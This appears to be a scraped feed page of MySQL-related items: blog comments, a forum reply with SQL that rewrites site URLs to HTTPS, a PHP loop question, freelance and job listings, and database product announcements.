          Comment on MySQL Session variables and Hints by Güzin Başcı      Cache   Translate Page      
Thanks for the article. I use it in some projects.
          Comment on MySQL 5.7 By Default 1/3rd Slower Than 5.6 When Using Binary Logs by Meral Sönmezer      Cache   Translate Page      
great post, thanks for this article.
          Re: URLs changed via DB query not reflected in course      Cache   Translate Page      
by Steve Bluck.  

Hi Ken,

I'll run through the suggestions in the blog but in the meantime the MySQL commands we ran for tables identified as having our site URL were:

UPDATE  mdl_page SET content = REPLACE(content, 'http://[site]/', 'https://[site]/');

UPDATE  mdl_page SET content = REPLACE(content, 'http://[site]', 'https://[site]');

So both trailing slash & non-trailing slash were accounted for. We found that the HTTPS replacement tool did all URLs instead of just our site, which led to broken links for sites that hadn't moved to HTTPS. Not sure which is worse now!


          very professional server administrator and expert presta shop      Cache   Translate Page      
I am looking for a professional server administrator, ideally one who knows how to work well and answer problems quickly, and who knows PrestaShop: an expert at PrestaShop who knows how to build models and fix ... (Budget: $2 - $45 USD, Jobs: HTML, MySQL, PHP, Prestashop)
          Web Application Developer - Kanetix Ltd. - Toronto, ON      Cache   Translate Page      
Have advanced database knowledge in at least one of Oracle, MS SQL or MySQL. Join Canada's fastest-growing internet technology company in the insurance industry...
From Indeed - Tue, 09 Oct 2018 20:49:55 GMT - View all Toronto, ON jobs
          Senior Software Engineer, Java - Incognito Software - Ottawa, ON      Cache   Translate Page      
Experience configuring PostgreSQL, MySQL, and/or Oracle. We are looking for a Senior Java Developer for designing and implementing backend solutions based on...
From Incognito Software - Wed, 03 Oct 2018 23:58:47 GMT - View all Ottawa, ON jobs
          Small issue trying to print array values inside for loop [Solved]      Cache   Translate Page      

@computerbarry wrote:

Hi all

I've become a little stuck after I changed some of my code. I can't figure out what I have changed, because the commas and double quotes are causing some errors in the for loop.

When I load the page all I can see is:

ARRAY[‘MENU_NAME’] ARRAY[‘MENU_NAME’] ARRAY[‘MENU_NAME’]

How do I properly print the for loop so it displays the values correctly?

$stmtt = $mysqli->prepare("SELECT menu_name, menu_link, menu_class FROM menu");
$stmtt->bind_result($menu_name, $menu_link, $menu_class);
$stmtt->execute();
$stmtt->store_result();

$lnks = array();
while($stmtt->fetch()){
    $lnks[] = array(
        'menu_name' => $menu_name,
        'menu_link' => $menu_link,
        'menu_class' => $menu_class
    );
}

print "<nav>";
    print "<div>";
      print "<ul>";
        for($i = 0; $i < count($lnks); $i++):
            print "<li class='$lnks[$i]['menu_class']'><a href='/$lnks[$i]['menu_link']' class='$lnks[$i]['menu_class']'>$lnks[$i]['menu_name']</a></li>";
        endfor;
      print "</ul>";
    print "</div>";
print "</nav>";

Thanks,
Barry



          Devart Excel Add-ins 1.8      Cache   Translate Page      
Devart Excel Add-ins allow you to use powerful Excel capabilities for processing and analysis of data from cloud applications and relational databases, edit external data as usual Excel spreadsheets, and save data changes back to the data source you imported them from.

Key Features:

Powerful Data Import
With Devart Excel Add-ins you can precisely configure what data to load into the document. Select objects and columns and set complex data filters. If this is not enough, all the power of SQL is at your service, not only for relational databases, but for cloud applications too.

Quick Data Refresh
The main Devart Excel Add-ins benefit is the ability to periodically get the actual data from different data sources to Excel with a single click, without repeating the whole import operation each time. Refresh data in your workbook easily whenever you want.

Easy Data Modification
You can edit data in Excel just like you usually do: add or delete rows, modify cell values, etc. Use the full power of Excel to perform mass data update, insert, and delete operations against your data source. After you have finished editing, just click Commit and the changes will be posted back to the data source.

List of supported data sources:
- Oracle Database
- SQL Server
- MySQL
- PostgreSQL
- SQLite
- Salesforce
- Dynamics CRM
- Zoho CRM
- SugarCRM
- DB2
          Développeur .NET Full Stack - Bedard Ressources - Laval, QC      Cache   Translate Page      
Experience with databases (MySQL, SQL Server). Look no further, this position is offered exclusively through Bédard Ressources! $50,000 - $75,000 a year
From Bedard Ressources - Wed, 25 Jul 2018 19:14:52 GMT - View all Laval, QC jobs
          Percona Monitoring and Management (PMM) 1.15.0 Is Now Available      Cache   Translate Page      
Percona Monitoring and Management (PMM) is a free and open-source platform for managing and monitoring MySQL® and MongoDB® performance. You can run PMM in your own environment for maximum security and reliability. It provides thorough time-based analysis for MySQL® and MongoDB® servers to ensure that your data works as efficiently as possible. This release offers two new features for both the MySQL Community and Percona Customers: […]

The post Percona Monitoring and Management (PMM) 1.15.0 Is Now Available appeared first on Percona Database Performance Blog.


          Instrumenting Read Only Transactions in InnoDB      Cache   Translate Page      
Probably not well known but quite an important optimization was introduced in MySQL 5.6 – reduced overhead for “read only transactions”. While usually by a “transaction” we mean a query or a group of queries that change data, with transaction engines like InnoDB, every data read or write operation is a transaction. Now, as a […]
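
Since MySQL 5.6, a transaction can also be declared read only explicitly, which is what allows InnoDB to skip part of the usual transaction bookkeeping (a sketch; the query is a placeholder):

```sql
START TRANSACTION READ ONLY;
SELECT COUNT(*) FROM orders;
COMMIT;
```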

The post Instrumenting Read Only Transactions in InnoDB appeared first on Percona Database Performance Blog.


          Comment on Spring MVC Hibernate MySQL Integration CRUD Example Tutorial by herbert      Cache   Translate Page      
A couple of features in this project work fine, but some aren't okay; try reviewing it.
          redesign dashboard      Cache   Translate Page      
I would like to redesign the user dashboard of my website into a more modern user dashboard interface (Budget: $10 - $50 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Migration of 200 websites from sixteen Redhat 3.0 to four CentOS 7 Servers -- 2      Cache   Translate Page      
Project description: Migration of 200 web sites from sixteen Redhat 3.0 to four CentOS 7 servers.
Scope:
- 200 websites running on:
  - apache
  - html (http/https)
  - php
  - perl
  - tomcat
  - mysql... (Budget: $250 - $750 CAD, Jobs: Apache, HTML, MySQL, Perl, PHP)
          Symphony website with articles, contributor page and login      Cache   Translate Page      
Hi, I'm interested in someone who has experience with Symphony, www.getsymphony.com/. I want you to modify the comment section in Symphony and modify the article interface a little bit, make members... (Budget: $30 - $250 USD, Jobs: HTML, MySQL, PHP, Symfony PHP)
          Internship: Ruby software developer with German language skills (C1/C2), app agency Karlsruhe (m/f)      Cache   Translate Page      
Job offer: More info and applications at: https://www.campusjaeger.de/jobs/519?s=18101178 For an exciting project we are looking for a motivated intern in the area of web development. Who are we looking for? * You bring experience with internet technologies and protocols such as HTML5, XML, CSS3 and JavaScript (jQuery, ..) as well as Bootstrap, and you always stay on the cutting edge of new technologies. * You are familiar with SQL and NoSQL databases (e.g. MySQL, Redis, MongoDB) and with the latest deployment tools and version control systems such as Git and continuous integration. * You enjoy working independently, accurately and with 'Clean ... 0 comments, read 41 times.
          Magento API Troubleshooting      Cache   Translate Page      
We have issues with Magento 1.x API connecting to external services. Need someone to fix the same urgently. (Budget: $30 - $250 USD, Jobs: API, Magento, MySQL, PHP, Shopping Carts)
          Make a search by number plate and match products to the vehicle
I want it to look like this page: https://www.thansen.dk/bil/n-487801686/#autopartsManuel, where you are able to search by number plate and it matches the products to the vehicle. The page it has to be done on: www.bilkrog.dk... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Software Architecture, XML)
          Comments on: Introduction to the Node-RED IoT software + setup, with Parisa Pourbolourchian
Hello, thank you for your interest. Since the MySQL tutorials have not yet been published on the site, please wait for the upcoming parts of the Node-RED tutorial, where we will cover this. Follow up through this page; we will announce it once it is published.
          Comments on: Working with the Node-RED IoT software – Part 1, with Parisa Pourbolourchian
Hello, thank you for your interest. Since the MySQL tutorials have not yet been published on the site, please wait for the upcoming parts of the Node-RED tutorial, where we will cover this. Follow up through this page; we will announce it once it is published.
          Application modification
I have an email marketing application that I need modified. It is currently limited to 5 users; I need it to support unlimited users, and I need a frontend where users can sign up. The application is... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          Implementing a Simple Distributed Transaction System
Implementing a simple distributed transaction system (an order system). Background: the earliest version of the company's order management was implemented with PHP + MySQL. What problems does this bring? If everything is kept in a single database instance and handled entirely with single-machine transactions, data consistency is fairly easy to guarantee. But there are two problems: first, multi-instance deployment is impossible, so the system cannot respond quickly once the user base grows; second, ...
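The single-instance approach described above can be sketched as follows. This is an illustrative example, not the post's actual code: it uses Python's sqlite3 as a stand-in for a single MySQL instance, and the `stock`/`orders` tables and `place_order` function are hypothetical.

```python
import sqlite3

# Stand-in for a single database instance: one local database, one connection.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE stock (item TEXT PRIMARY KEY, qty INTEGER)")
conn.execute(
    "CREATE TABLE orders (id INTEGER PRIMARY KEY AUTOINCREMENT, item TEXT, qty INTEGER)")
conn.execute("INSERT INTO stock VALUES ('widget', 10)")
conn.commit()

def place_order(item, qty):
    """Decrement stock and record the order in one local transaction.

    On a single instance this either fully succeeds or fully rolls back,
    so stock and orders can never disagree."""
    try:
        with conn:  # opens a transaction; commits on success, rolls back on error
            cur = conn.execute(
                "UPDATE stock SET qty = qty - ? WHERE item = ? AND qty >= ?",
                (qty, item, qty))
            if cur.rowcount == 0:
                raise ValueError("insufficient stock")
            conn.execute("INSERT INTO orders (item, qty) VALUES (?, ?)",
                         (item, qty))
        return True
    except ValueError:
        return False

print(place_order("widget", 3))   # True: stock drops to 7, order recorded
print(place_order("widget", 99))  # False: whole transaction rolled back
```

Once stock and orders live in separate databases on separate instances, no single `with conn:` block covers both writes; that is exactly the gap a distributed transaction system (such as the order system described in the post) has to fill.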
          Full Stack .NET Developer - Bedard Ressources - Laval, QC
Experience with databases (MySQL, SQL Server). Look no further: this position is offered exclusively through Bédard Ressources!... $50,000 - $75,000 a year
From Bedard Ressources - Wed, 25 Jul 2018 19:14:52 GMT - View all Laval, QC jobs

